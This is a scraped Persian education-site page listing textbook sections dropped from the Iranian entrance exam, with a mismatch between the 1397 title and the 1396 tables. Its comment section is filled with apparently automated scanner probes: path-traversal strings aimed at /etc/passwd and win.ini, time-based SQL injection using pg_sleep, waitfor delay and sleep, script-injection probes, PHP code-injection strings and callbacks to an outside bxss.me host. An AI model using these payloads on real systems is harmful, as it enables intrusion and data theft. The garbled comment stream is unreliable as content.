حذفیات کنکور 97


حذفیات کنکور 97

تعداد بازدید:

27 بازدید

حذفیات کنکور 97

نظرات:

271 دیدگاه

حذفیات کنکور 97

انتشار:

12 فروردین 1396

ارسال شده توسط مدیر سایت

لینک کوتاه این مطلب:

https://darsbox.org/b/5295

حذفیات کنکور 97

حذفیات کنکور 96

طبق اعلام سازمان سنجش آموزش کشور، حدفیات کنکور 96 در رشته های مختلف طبق جداول زیر می باشد:

الف)حذفیات کنکور 96 دروس عمومی

نام کتاب کد کتاب پایه تدریس سال چاپ حذفیات و ملاحطات
قرآن و تعليمات دينی2 (دين ‌و زندگی 2) 222 دوم 93 -  فعاليت‌ها شامل: نمونه يابي درصفحة 11- خودکاوي در صفحات 89 ، 90 و 118 - مقايسه در صفحة 91- ذکر نمونه‌ها در صفحات 106، 117 و 129- تطبيق در صفحات 119 و 151- همفکری در صفحة 128 - تفکر در آيات در صفحة 130- بررسي در صفحات 131، 167 و 180 2- پيشنهاد­ها در صفحات 14، 28 تا 31، 41، 59، 67، 75، 83، 109، 123، 133، 143، 159، 187 و 189 3- يادآوري­ها در صفحات 2 تا 3، 101 و 111 4- شعر صفحة 15 5- پاورقي­هاي كتاب 6- ترجمه­هايي که در مقابل آيات در کتاب نوشته شده است. 7- گام­ها در صفحات 27، 47، 97، 108، 123، 142، 158، 173 و 188 8- بيشتر بدانيم در صفحات 23، 25 تا 27، 57 تا 58، 93 تا 96، 99، 120 تا 122، 141 تا 142، 153 تا 157، 171تا 172، 185 تا 186  9- مطالب نوشته شده در كادر آبي: صفحات 8 تا 11و 19 تا 21 و 39 تا 40
قرآن و تعليمات دينی 3 (دين و زندگی 3 ) 251 سوم 94 1- فعاليت‌ها شامل: بررسي در صفحات 15، 30، 102، 176 , 190، 202، جست‌وجو در صفحة 39 راه حل در صفحة 192 شناسايي عوامل در صفحة 203 تطبيق در صفحات 42، 44، 88، 139 خودارزيابي در صفحات 113، 161، 178 مقايسه در صفحة 120 انديشه در صفحة 138 طبقه‌بندي در صفحة 189 2- براي مطالعه‌ها : در صفحات 15 تا 16، 28 تا 29، 33، 34 تا 35، 41، 44 تا 46، 56 تا 57، 65 تا 66، 78، 90 تا 91، 92، 99، 101 تا 102، 120 تا 121، 126 تا 129، 140، 150، 162 تا 163، 174، 181 تا 182، 192 تا 195، 205، 207 تا 212 3- پيشنهادها : در صفحات 35، 47، 57، 72، 93، 106، 115، 131، 141، 165، 183، 195 4- گام‌ها : در صفحات 18، 71، 107، 130، 151، 166، 206  5- يادآوري‌ها : در صفحات 6 تا 7، 154، 168 تا 169 6- ترجمه‌هايي كه در مقابل آيات در كتاب نوشته شده است. 7- پاورقي‌ها
معارف اسلامی ( دين و زندگی ) 285/1 پیش دانشگاهی 95 - فعاليت‌ها شامل : - بررسي در صفحات 28، 51 ، 59، 61، 72، 96 - برنامه‌ريزي در صفحه 62 -  پيشنهاد در صفحة 20، 29، 40، 77 ,88- ذكر نمونه‌ها در صفحه 47- خودارزيابي در صفحات 34،36،69، 73-  هم‌انديشي در صفحات 93 و  98،  مقايسه در صفحه 33، پيام  آيات در صفحه24، يادآوري در صفحه3 2- براي مطالعه: در صفحات 10 تا 12، 19 تا 20، 53 تا 54، 63، 75 تا 76، 95، 97 تا98، 99 تا 102، 110 تا 138 3- ترجمه‌هايي كه در مقابل آيات نوشته شده است. 4- پاورقي‌ها 5- كتاب‌نامه
عربی 2 کليه رشته­ ها (به استثنای رشته ادبيات و علوم انسانی) 224/1 دوم 93 - بخش‌هاي الصورالجماليه في القرآن الكريم في رحاب نهج البلاغه و في ظلال الدعاء - تمامی متون تحت عنوان «کَـيـفَ» در هر ده درس کتاب - مبحث اسماء خمسه - مبحث «أشعةُالقمـرِالفِضّـيَّـةُ» (جایگاه صفت در ترکیب اضافی) - مبحث تطابق عدد و معدود
عربی3 کليه رشته‌ها (به ‌استثنای‌ رشته ادبيات و علوم انسانی)   254/1 سوم 94 - نوع تقسیم حال:«حال فعليه و اسميه» - مبحث«واو حالیه» / مبحث (ماضی+ ماضی= ماضی بعید یا ماضی ساده) و (ماضی + مضارع = ماضی استمراری) - نقش «حال» بودنِ کلمه «وَحدَهُ» - فعل مضاعف - اسماء خمسه - پاورقی درباره نکره مقصوده بودن (أيّ) و (أيّة) - بحث توابع (عطف بیان و صفت) - متن دوم درس دوم تحت عنوان المشهدُالثاني و بَعدَ مُرورِ زَمَن - معتلات مزید؛ - فعل استثنائی «رأی،يری، رؤيةً، رَبه همراه مشتقات آن» ؛ - معتلات مجهول مانند: قيلَ، یُـقالُ ؛ - اعراب تقديری اسم مختوم به ضمیر متکلم ي مانند نِعمَتي ؛ - تشخيص نوع اعلال و تشخيص ماقبل اعلال؛ - تشخیص حروف اصلی در معتلات؛ - ذکر نوع مفعول مطلق در «أيضاً، حقّاً، جیدّاً، شُکراً، سَمعاً و طاعةً، سُبحانَ اللهِ، مَعاذَ اللهِ...»؛ - - نکته های صفحه 61 (دو نوع حال تا پایان صفحه و دو سطر اول صفحه 62)؛ - متن داستانی خانواده آقای مجدّی؛ - واژه های جدید کارگاه ترجمه که در انتهای کتاب درسی در بخش واژه نامه وجود ندارند؛ - بخش ملحقات در انتهای کتاب

ب)حذفیات کنکور 96 دروس تخصصی رشته ریاضی

نام کتاب کد کتاب پایه تدریس سال چاپ حذفیات و ملاحطات
شيمي 2 و آزمايشگاه 227/1 دوم 93 - مطالب بيشتر بدانيد، آزمايش كنيد. - نامگذاري فراتر از كتاب درسي به ويژه براي تركيب‌هاي آلي جزو هدف‌هاي برنامه درسي شيمي نيست.
شيمي 3 و آزمايشگاه 257/1 سوم 94
شيمي 289/1 پیش دانشگاهی 95
آمار و مدلسازی( علوم رياضي) 234/3 دوم 93 فصل هشتم
فيزيک (1) و آزمايشگاه 206/1 اول 92 - قسمت‌هاي مطالعات آزاد، پيوست‌ها، آونگ‌هاي مخروطي، حركت‌هاي دوراني در سطح قائم - زندگي‌نامه‌ها، سرگذشت دانشمندان
فيزيك (2) و آزمايشگاه 226/1 دوم 93
فيزيك (3) و آزمايشگاه ( علوم رياضي) 256/4 سوم 94
فيزيك ( علوم رياضي) 293/2 پیش دانشگاهی 95

ج)حذفیات کنکور 96 دروس تخصصی رشته تجربی

نام کتاب کد کتاب پایه تدریس سال چاپ حذفیات و ملاحطات
زيست­ شناسي و آزمايشگاه 1 231/1 دوم 93 بخش‌هاي بيشتر بدانيد،جدول­ها، پانويس صفحات و پيوست‌هاي كتاب
زيست شناسي و آزمايشگاه 2 261/1 سوم 94
زيست شناسي 290/2 پیش دانشگاهی 95
شيمي 2 و آزمايشگاه 227/1 دوم 93 - مطالب بيشتر بدانيد، آزمايش كنيد. - نامگذاري فراتر از كتاب درسي به ويژه براي تركيب‌هاي آلي جزو هدف‌هاي برنامه درسي شيمي نيست.
شيمي 3 و آزمايشگاه 257/1 سوم 94
شيمي 289/1 پیش دانشگاهی 95
آمار و مدلسازی( علوم رياضي) 258/5 دوم 93 فصل هشتم
فيزيک (1) و آزمايشگاه 206/2 اول 92 - قسمت‌هاي مطالعات آزاد، پيوست‌ها، آونگ‌هاي مخروطي، حركت‌هاي دوراني در سطح قائم - زندگي‌نامه‌ها، سرگذشت دانشمندان
فيزيك (2) و آزمايشگاه 226/2 دوم 93
فيزيك (3) و آزمايشگاه ( علوم رياضي) 256/3 سوم 94
فيزيك ( علوم رياضي) 288/1 پیش دانشگاهی 95

د)حذفیات کنکور 96 دروس تخصصی رشته انسانی

نام کتاب کد کتاب پایه تدریس سال چاپ حذفیات و ملاحطات
عربی 2 رشته ادبيات و علوم انسانی 224/2 دوم 93 در بخش‌های الأضواء القرآنية و في رِحابِ نهج البلاغة فقط از آن دسته از کلمات و عبارات استفاده مي­شود که در متن دروس به کار رفته باشد و در انتهای کتاب در بخش واژه نامه نیز درج شده باشد. - واژه‌های جدید در بخش کارگاه ترجمه که در انتهای کتاب درسی در بخش واژه نامه وجود ندارند؛
عربی 3 رشته ادبيات و علوم انسانی 254/2 سوم 94 بخش‌های الصُوَرُ الجَماليّة في القرآن الکريم و في رِحابِ نهج البلاغة و في ظِلالِ الدُعاء - تشخيص نوع اعلال؛ - تشخيص ماقبل اعلال؛ - تشخیص حروف اصلی در معتلات؛ - ذکر نوع مفعول مطلق در «أيضاً، حقّاً، جیدّاً، شُکراً، سَمعاً و طاعةً، سُبحانَ اللهِ، مَعاذَ اللهِ...»؛ به عنوان نمونه: درس 7 ص 79 بخش كارگاه شماره 3 «کلمه کثيراً گاهی در جمله نقش مفعول مطلق را ایفا می‌کند.» - واژه‌های جدید کارگاه ترجمه که در انتهای کتاب درسی در بخش واژه نامه وجود ندارند؛ - بخش ملحقات در انتهای کتاب.
عربی  رشته ادبيات و علوم انسانی 316/1 پیش دانشگاهی 95 - ملحقات جمع سالم - کلیه پاورقی­ها - درس 8 ص 67 بخش قواعد دو سطر «و قد يکون العامل اسماً...» تا «بغير الحق»
 
 
مطالب ویژه پیش دانشگاهی
بارم بندی دروس پیش دانشگاهی   دی وی دی های آموزشی پیش دانشگاهی نمونه سوالات امتحان نهایی پیش دانشگاهی
مشاهده مطلب   مشاهده مطلب مشاهده مطلب

 

با دوستانتان به اشتراک بگذارید
ارسال دیدگاه

لطفا همه فیلدها را پر کنید

CAPTCHA


نظرات ثبت شده

1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

1_9595


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


1 13 دی 1397

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


1 13 دی 1397

..\..\..\..\..\..\..\..\windows\win.ini


1 13 دی 1397

'"()&%<acx><ScRiPt >eqLM(9255)</ScRiPt>


1 13 دی 1397

................windowswin.ini


1 13 دی 1397

../../../../../../../../../../windows/win.ini.jpg


1 13 دی 1397

../../../../../../../../../../boot.ini


1 13 دی 1397

../../../../../../../../../../windows/win.ini


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

/WEB-INF/web.xml


1 13 دی 1397

1'"()&%<acx><ScRiPt >eqLM(9710)</ScRiPt>


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

/\../\../\../\../\../\../\../etc/passwd


1 13 دی 1397

file:///etc/passwd


1 13 دی 1397

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


1 13 دی 1397

1


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


1 13 دی 1397

/.././.././.././.././.././.././.././../etc/./passwd%00


1 13 دی 1397

1


1 13 دی 1397

%2fetc%2fpasswd


1 13 دی 1397

1


1 13 دی 1397

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


1 13 دی 1397

1


1 13 دی 1397

/etc/passwd


1 13 دی 1397

/../..//../..//../..//../..//../..//etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1 13 دی 1397

../../../../../../../../../../etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1 13 دی 1397

1


1 13 دی 1397

(select convert(int,CHAR(65)))


1 13 دی 1397

../../../../../../../../../../../../../../../proc/version


1 13 دی 1397

1


1 13 دی 1397

<!--


1 13 دی 1397

JyI=


1 13 دی 1397

../../../../../../../../../../etc/passwd


1 13 دی 1397

1


1 13 دی 1397

'"


1 13 دی 1397

@@YQ816


1 13 دی 1397

\


1 13 دی 1397

1


1 13 دی 1397

1'"


1_9398 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1'"()&%<acx><ScRiPt >eqLM(9410)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

1


<!-- 13 دی 1397

1


'" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


(select convert(int,CHAR(65))) 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

/www.vulnweb.com


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


/www.vulnweb.com 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


1 13 دی 1397

Ps1O9khG'));select pg_sleep(9); --


JyI= 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

lXFgsC2P');select pg_sleep(9); --


@@t2gGQ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

8uzaSynO';select pg_sleep(9); --


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}\


))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 13 دی 1397

1


1 13 دی 1397

http://hitpAFNU9MCYB.bxss.me/


1 13 دی 1397

1


\ 13 دی 1397

1


1 13 دی 1397

-1));select pg_sleep(9); --


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}


1'" 13 دی 1397

1


1 13 دی 1397

-1);select pg_sleep(9); --


1 13 دی 1397

";print(md5(acunetix_wvs_security_test));$a="


1 13 دی 1397

-1;select pg_sleep(6); --


1 13 دی 1397

';print(md5(acunetix_wvs_security_test));$a='


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

AQgPalGL'; waitfor delay '0:0:6' --


1 13 دی 1397

;print(md5(acunetix_wvs_security_test));


1 13 دی 1397

1


1 13 دی 1397

1 waitfor delay '0:0:9' --


1 13 دی 1397

1


1 13 دی 1397

comment/.


1 13 دی 1397

comment


1 13 دی 1397

1


1 13 دی 1397

1 waitfor delay '0:0:3' --


http://hitkIiyDjakWu.bxss.me/ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

comment


1 13 دی 1397

-1); waitfor delay '0:0:3' --


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1; waitfor delay '0:0:3' --


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/


1 13 دی 1397

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


comment/. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1" OR 2+899-899-1=0+0+0+1 --


1 13 دی 1397

^(#[email protected]#$)(()))******


1 13 دی 1397

'"()


1 13 دی 1397

http://testasp.vulnweb.com/t/xss.html?%00.jpg


comment 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1' OR 2+119-119-1=0+0+0+1 or 'eMUIxdzf'='


${@print(md5(acunetix_wvs_security_test))}\ 13 دی 1397

1


1 13 دی 1397

!(()&&!|*|*|


1 13 دی 1397

1


comment 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1' OR 2+792-792-1=0+0+0+1 --


${@print(md5(acunetix_wvs_security_test))} 13 دی 1397

1


";print(md5(acunetix_wvs_security_test));$a=" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

)


1 13 دی 1397

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1 OR 2+114-114-1=0+0+0+1


';print(md5(acunetix_wvs_security_test));$a=' 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1 OR 2+438-438-1=0+0+0+1 --


'"() 13 دی 1397

1


;print(md5(acunetix_wvs_security_test)); 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

RynHOih3


1 13 دی 1397

1


^(#[email protected]#$)(()))****** 13 دی 1397

1


WEB-INF\web.xml 13 دی 1397

1


1 13 دی 1397

1


!(()&&!|*|*| 13 دی 1397

1


WEB-INF/web.xml 13 دی 1397

1


1 13 دی 1397

1


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.